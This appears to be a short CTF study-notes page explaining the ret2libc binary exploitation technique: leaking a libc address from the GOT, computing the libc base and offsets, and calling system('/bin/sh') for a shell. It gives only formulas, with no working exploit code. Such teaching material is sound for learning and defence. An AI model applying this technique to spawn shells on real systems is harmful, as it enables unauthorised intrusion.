ret2libc
Leak a function address from libc => Compute libc base address => call system("/bin/sh") or use one_gadget
Theory
If the function is dynamically linked, it is possible to utilize gadgets from libc. For example, if the binary calls puts()
, we can control EIP/RIP and then leak an address from GOT. If libc.so
is given, just attach it and find the offset; otherwise, use libc database to search the offset. We compute the libc base address:
libc_base_address = leaked_address_from_GOT - offset
Then we compute the system() address and "/bin/sh" address:
system_address = libc_base_address + offset
bin_sh_address = libc_base_address + offset
In the end we call system("/bin/sh")
. Read this writeup to learn more:
Template:
Last updated
Was this helpful?